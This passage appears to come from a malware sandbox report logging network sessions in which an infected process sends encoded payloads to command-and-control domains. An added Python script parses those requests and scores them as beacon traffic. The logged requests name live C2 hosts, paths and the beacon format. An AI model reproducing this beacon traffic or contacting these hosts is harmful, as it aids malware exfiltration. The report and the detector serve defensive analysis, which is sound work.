                                                                                                                        Data Raw: 62 42 77 3d 2f 7a 2f 30 37 79 78 66 44 6a 58 32 34 2b 4d 69 53 36 2b 76 34 44 2b 73 67 54 6f 6b 33 47 30 2b 50 36 70 57 62 6b 55 6e 74 6c 71 63 79 50 39 6a 42 7a 58 39 31 4b 35 4b 7a 35 4b 2b 54 63 44 4b 53 78 45 34 64 58 42 48 68 79 7a 5a 54 59 46 39 2b 62 68 70 57 6c 6a 54 41 2b 6c 76 35 62 4a 6e 71 2f 77 57 77 49 2b 72 6c 65 4f 71 4c 4e 56 63 43 65 33 7a 56 4e 4f 57 75 33 6b 75 31 63 74 32 6b 65 44 2f 4c 54 66 57 63 2b 6a 48 57 4b 42 56 53 6f 46 73 2f 56 34 62 4f 51 7a 69 77 34 77 79 68 74 76 41 42 51 4c 74 59 71 4e 35 5a 58 77 2b 4b 32 4d 47 69 76 32 6c 68 68 6a 69 52 39 77 61 34 7a 4c 68 50 4b 49 39 61 61 45 4d 35 31 71 5a 45 30 4a 70 6b 39 43 6d 4c 37 38 45 33 35 69 5a 30 50 72 76 53 34 31 56 6c 31 59 48 49 6b 56 69 4e 77 52 4d 35 44 36 69 30 71 35 47 6c 31 47 38 78 69 7a 45 62 64 31 4f 38 33 55 70 42 47 38 35 4e 7a 64 55 64 5a 48 43 50 36 64 58 77 52 35 72 36 4c 74 4f 72 78 67 45 56 76 43 2b 67 37 36 4b 57 68 30 50 58 50 58 45 32 37 44 4f 51 74 47 62 2b 35 50 36 55 67 42 41 79 56 33 62 6e 56 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9+bhpWljTA+lv5bJnq/wWwI+rleOqLNVcCe3zVNOWu3ku1ct2keD/LTfWc+jHWKBVSoFs/V4bOQziw4wyhtvABQLtYqN5ZXw+K2MGiv2lhhjiR9wa4zLhPKI9aaEM51qZE0Jpk9CmL78E35iZ0PrvS41Vl1YHIkViNwRM5D6i0q5Gl1G8xizEbd1O83UpBG85NzdUdZHCP6dXwR5r6LtOrxgEVvC+g76KWh0PXPXE27DOQtGb+5P6UgBAyV3bnVnuxxb7UKZbHct2lBeIqnfTGhBB2TMFJ/8GAwS3vAwkQCtFxJOs54cu66bGjyC8TyLkP4ttWPJ9NFhlJ/5dK8kBKyINmRY2zBTRXZx949zs7lPdPCwNYjTY2JAqSbFNtIr5QxY8sQy9RPpy74Lk3v/4P5Il0UWT5O/RlCafjl9nOs/5mx+35r0br8bkaycAROeXf5iB7hec6hTuD/NOPsUBtZsFwuONy8VfU+yR1NhhyoRdwsXcvKQMHeF4UA0TYgzK6MLfpe3s+Rk3k1lVWEoOeARMxzKm15X3iqdEFIqrxXDUCqnYiVxYVk7nsg6xfyBhBIESYntKedE6hY1vEtHoCptRdF6aZlxlGU05GGsivEQWDTvhTRjaUUoI/GiEIopT1h1m7qLOFvH3nYih1GwetHxJVjlGdys0q8d7rJ5y7XdZxwm5kK4Mlg5GlMPIVcsMX89QMLibGknZCeqJZPArFkdaiCzu3O74Yza7AmhMwrdC+zkZLLje9t0mlbCbQwh9Vdvz1jxWP3fVo55i1d3uhqim7bLR9zjBMaQUGxwWnNjQSgkSHZRcpfXV+cj73Xe18lFc3WkQGI1SZyzy80khPcTJ/2170tpTblNQWivG5sVnPwi9XJI27HN1ewaL2aKQwWxQIB0O6gHIoy8/D71wAIfgJy7SYvGV [TRUNCATED]
                                                                                                                         Nov 21, 2024 16:22:48.037244081 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:47 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WNJHNMP1s4YqATvDiWrCgeCuP33KOWUl9QLx7VCZa6ggiLLWkglY3iE%2BG6vJnnWhLyQ7YBz1%2Fz0G%2Fk5NvqwGbipoEPRh6EOWWlAz1FGij3c9o2fzExkQLVDz4t9%2FDU9hIeZweCxwEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61ad6079ea32d0-EWR
                                                                                                                        Content-Encoding: gzip
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3123&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1641&delivery_rate=0&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 32 62 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 54 ef 6b db 30 10 fd 9e bf 42 0d a5 b2 21 b5 d2 ae 74 5b fd 03 ba 24 65 85 24 2d 5b ca 18 63 14 59 3a db 0a 8e e4 49 4a 82 97 f8 7f 1f b6 d3 34 2b b4 63 1f 0c 92 ee bd 7b 77 a7 67 05 47 c3 bb c1 ec fb fd 08 7d 9e 4d c6 e8 fe e1 d3 f8 76 80 ba a7 84 dc 8e 66 37 84 0c 67 c3 36 72 ee f5 09 19 4d bb 51 27 c8 ec 22 8f 82 0c 28 8f 3a 81 15 36 87 e8 a2 7f 81 a6 ca a2 1b b5 94 3c 20 ed 61 27 20 0d 28 88 15 2f 6b de 59 74 80 c9 ce a2 4e 50 44 b3 0c 90 86 5f 4b 30 16 38 7a f8 32 46 6b 6a 90 54 16 25 35 0e 29 89 6c 26 0c 32 a0 57 a0 bd 80 14 0d ed 9a 73 61 85 92 34 cf cb 1e a2 e8 af 02 3a a0 b5 d2 4d 22 90 4c 2d a5 05 0d 1c ad 33 91 03 b2 ba 14 32 45 56 a1 a5 01 44 25 1a d5 e0 a1 62 cb 05 48 5b 9f 67 54 f2 1a f8 5c d9 4e d6 30 2d 0a 1b 39 c9 52 b2 5a dc 71 37 4f 4b c4 1c 77 b3 a2 1a c5 21 f5 98 92 16 a4 7d ca b9 dd ee 8f be 09 c9 d5 da e3 bb 88 2f 12 27 6e 79 3c 8c 3d a6 81 5a 18 e5 50 c7 1c dc ca 61 d7 e7 9e 90 12 74 7d 0f 61 77 dd a6 78 7c 1c dc 1c b3 d5 71 41 [TRUNCATED]
                                                                                                                        Data Ascii: 2b2Tk0B!t[$e$-[cY:IJ4+c{wgG}Mvf7g6rMQ'"(:6< a' (/kYtNPD_K08z2FkjT%5)l&2Wsa4:M"L-32EVD%bH[gT\N0-9RZq7OKw!}/'ny<=ZPat}awx|qA5]p<#w{Ofd~z2W~-KZ^UTAO=Y9NDii'*77k
                                                                                                                         Nov 21, 2024 16:22:48.037290096 CET | 266 bytes | IN | Data Raw: a4 60 77 02 e6 53 39 a3 e9 94 2e c0 c1 b5 4b b0 fb a3 ff d3 a3 45 01 92 0f 32 91 73 87 ba 7e d7 8f ff 8b c2 dd aa 12 89 b3 97 ab 8d d7 8e f7 f5 3e 45 a2 e9 02 9a 3e 33 10 69 66 c3 33 9f 7a 6b c1 6d d6 ac 8c 2d 73 f0 0a 65 1a bf 85 98 c6 46 e5 4b
                                                                                                                        Data Ascii: `wS9.KE2s~>E>3if3zkm-seFKx]=Js!JPVX! TWr"qp(2Gs3(/ZjeCnr>Zca,H2dt({%lDM-2*Sn'vturzq*q`(


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         32 | 192.168.2.9 | 50006 | 172.67.209.48 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:22:49.609829903 CET | 342 bytes | OUT | GET /huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1
                                                                                                                        Host: www.ampsamkok88.shop
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                         Nov 21, 2024 16:22:50.900764942 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:50 GMT
                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=En%2BN%2BPcwoi8J4UHt61U1AZt8GLf4%2F%2FaB86evH%2Bv6dcGDcDNlvLNoQIT3y8mSYLvwvipgtgFbHaI01pQnyLPae70cJoJxzdpmWegBU4Y1EZWz7VHhyhP6rgPEGM4%2B91i90LSHdytFHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8e61ad724b5943b0-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2099&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=342&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                        Data Raw: 34 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b [TRUNCATED]
                                                                                                                        Data Ascii: 4e5<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$par
                                                                                                                         Nov 21, 2024 16:22:50.900789976 CET | 808 bytes | IN | Data Raw: 61 6d 73 3d 7b 72 3a 27 38 65 36 31 61 64 37 32 34 62 35 39 34 33 62 30 27 2c 74 3a 27 4d 54 63 7a 4d 6a 49 77 4d 6a 55 33 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65
                                                                                                                        Data Ascii: ams={r:'8e61ad724b5943b0',t:'MTczMjIwMjU3MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName(


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         33 | 192.168.2.9 | 50007 | 209.74.77.109 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:22:56.474909067 CET | 601 bytes | OUT | POST /6gtt/ HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.gogawithme.live
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.gogawithme.live/6gtt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 66 45 6f 55 73 33 78 62 74 43 48 52 50 62 42 64 6a 61 53 4a 71 34 69 54 73 52 72 7a 50 2f 66 6b 4c 5a 75 73 58 75 6e 2b 56 6d 72 76 32 4c 58 6f 66 47 79 46 59 2b 65 69 73 53 4a 39 37 65 5a 51 32 61 75 6f 55 62 79 63 6c 4f 36 41 46 75 4d 6a 38 6f 72 76 64 39 44 56 59 69 33 64 76 64 56 35 45 6e 6a 76 2f 6e 72 6d 4b 58 61 64 41 50 4e 4a 31 6b 34 4c 37 36 47 4a 30 6d 52 4e 52 42 30 39 66 62 54 53 48 4e 55 2f 67 44 64 57 68 76 58 79 6f 41 31 45 5a 71 4b 6a 38 56 36 42 6f 73 44 55 58 51 66 33 37 31 42 6b 53 54 43 78 32 76 53 4e 62 7a 73 46 77 42 73 6e 7a 68 6e 71
                                                                                                                        Data Ascii: bBw=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUXQf371BkSTCx2vSNbzsFwBsnzhnq
                                                                                                                         Nov 21, 2024 16:22:57.787565947 CET | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:22:57 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         34 | 192.168.2.9 | 50008 | 209.74.77.109 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:22:59.142610073 CET | 625 bytes | OUT | POST /6gtt/ HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.gogawithme.live
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.gogawithme.live/6gtt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 66 45 6f 55 73 33 78 62 74 43 48 52 4f 37 52 64 6d 39 4f 4a 74 59 69 53 69 78 72 7a 64 2f 66 6f 4c 5a 69 73 58 76 54 75 4a 41 54 76 33 75 37 6f 65 46 71 46 66 2b 65 69 6e 79 4a 38 31 2b 5a 68 32 61 6a 43 55 61 4f 63 6c 50 61 41 46 75 63 6a 2f 62 44 73 50 64 44 58 54 43 33 54 79 4e 56 35 45 6e 6a 76 2f 6e 4f 37 4b 58 43 64 41 66 39 4a 76 41 4d 49 32 61 47 4b 38 47 52 4e 56 42 30 35 66 62 54 38 48 4f 51 56 67 47 42 57 68 73 44 79 6f 52 31 44 51 71 4b 6c 68 46 37 4f 75 63 32 4d 5a 41 76 31 31 6e 52 6d 4e 54 57 73 34 75 75 54 4b 42 6c 65 6c 57 73 41 30 47 75 43 38 57 33 32 6e 71 65 6e 52 44 56 62 69 52 4a 6b 74 42 49 55 46 41 3d 3d
                                                                                                                        Data Ascii: bBw=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelWsA0GuC8W32nqenRDVbiRJktBIUFA==
                                                                                                                         Nov 21, 2024 16:23:00.512301922 CET | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                                                                                        Date: Thu, 21 Nov 2024 15:23:00 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Length: 389
                                                                                                                        Connection: close
                                                                                                                        Content-Type: text/html
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
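The sessions above all share one request shape: a POST (or GET) to a short single-segment path, the payload carried as one base64-looking blob under a short parameter name (bBw, with PBk as a second key on the GET), a legacy IE 10 on Windows 7 user-agent, Origin and Referer pointing back at the same host and path, Connection: close on every request, and a 404 from whichever host is tried before the next domain is used. That shape, not the server's answer, is what a detector keys on. The Python below is an added example, not part of the Joe Sandbox report and not FormBook's or the sandbox's own code: it parses raw requests as they appear in the sessions, scores each one against that shape, and groups every host that scores above a threshold with the URI path used against it. The request text is constructed from the headers visible above with bodies cut short; the benign www.example.com request, the threshold of 3, and all function and constant names are assumptions for the illustration.

```python
import re

# Constructed sample input (not copied from a pcap): request lines, headers and
# the start of each body are taken from the sessions above; bodies are cut short
# and headers the scorer does not read are omitted from the second and third
# request. The fourth request is a benign control that is not in the report.
SAMPLE_REQUESTS = [
    "POST /huvt/ HTTP/1.1\r\n"
    "Host: www.ampsamkok88.shop\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "Origin: http://www.ampsamkok88.shop\r\n"
    "Cache-Control: max-age=0\r\n"
    "Content-Length: 1228\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.ampsamkok88.shop/huvt/\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)\r\n"
    "\r\n"
    "bBw=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlqcyP9jBzX91K5Kz5K+TcDKSxE4dXBHhyzZTYF9",
    "GET /huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP"
    "/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbV HTTP/1.1\r\n"
    "Host: www.ampsamkok88.shop\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)\r\n"
    "\r\n",
    "POST /6gtt/ HTTP/1.1\r\n"
    "Host: www.gogawithme.live\r\n"
    "Origin: http://www.gogawithme.live\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Referer: http://www.gogawithme.live/6gtt/\r\n"
    "User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)\r\n"
    "\r\n"
    "bBw=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6A",
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/132.0\r\n"
    "\r\n",
]

# Observables taken from the sessions above. The user-agent is the exact string
# this sample sent; other builds may use a different one, so it is one signal of
# several rather than the signal.
OBSERVED_UA = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)"
SHORT_DIR = re.compile(r"/[A-Za-z0-9]{2,8}/")            # /huvt/, /6gtt/
SHORT_KEY = re.compile(r"[A-Za-z0-9]{2,4}")              # bBw, PBk
B64_VALUE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")      # one opaque blob per key


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, query, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")   # first colon only: Referer keeps its http://
        headers[name.strip().lower()] = value.strip()
    return method, path, query, headers, body


def split_form(data):
    """key=value&... split without percent/plus decoding, so base64 '+' survives."""
    return [tuple(field.partition("=")[::2]) for field in data.split("&") if field]


def score_request(raw):
    """Count how many traits of the observed beacon shape a single request shows."""
    method, path, query, headers, body = parse_request(raw)
    reasons = []
    if SHORT_DIR.fullmatch(path):
        reasons.append("short single-segment directory path")
    payload = body if method == "POST" else query
    keys = [k for k, v in split_form(payload)
            if SHORT_KEY.fullmatch(k) and B64_VALUE.fullmatch(v)]
    if keys:
        reasons.append("base64-like blob under short key " + ",".join(keys))
    if headers.get("user-agent") == OBSERVED_UA:
        reasons.append("user-agent matches the one observed in this sample")
    origin = headers.get("origin", "")
    if method == "POST" and origin and headers.get("referer") == origin + path:
        reasons.append("self-referencing Origin/Referer on form POST")
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    return {"host": headers.get("host", ""), "path": path, "method": method,
            "keys": keys, "score": len(reasons), "reasons": reasons}


def c2_candidates(raws, threshold=3):
    """Hosts scoring at or above threshold, mapped to the path used against them."""
    out = {}
    for raw in raws:
        r = score_request(raw)
        if r["score"] >= threshold:
            out.setdefault(r["host"], r["path"])
    return out


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        r = score_request(raw)
        print(r["method"], r["host"], r["path"], r["score"], r["reasons"])
    print(c2_candidates(SAMPLE_REQUESTS))
```

Run on the constructed input the three beacons score 4 or 5 and the control scores 0, and c2_candidates returns www.ampsamkok88.shop with /huvt/ and www.gogawithme.live with /6gtt/, which is exactly the host-to-path pairing a responder wants to block or hunt for. The 404s both servers returned are deliberately not a factor: a host that answers 404 to this request shape has still been contacted by the injected process with an encrypted payload, so a 404 does not clear it.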


                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                         35 | 192.168.2.9 | 50009 | 209.74.77.109 | 80 | 6608 | C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                                                         Nov 21, 2024 16:23:01.810756922 CET | 1638 bytes | OUT | POST /6gtt/ HTTP/1.1
                                                                                                                        Host: www.gogawithme.live
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.gogawithme.live
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.gogawithme.live/6gtt/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
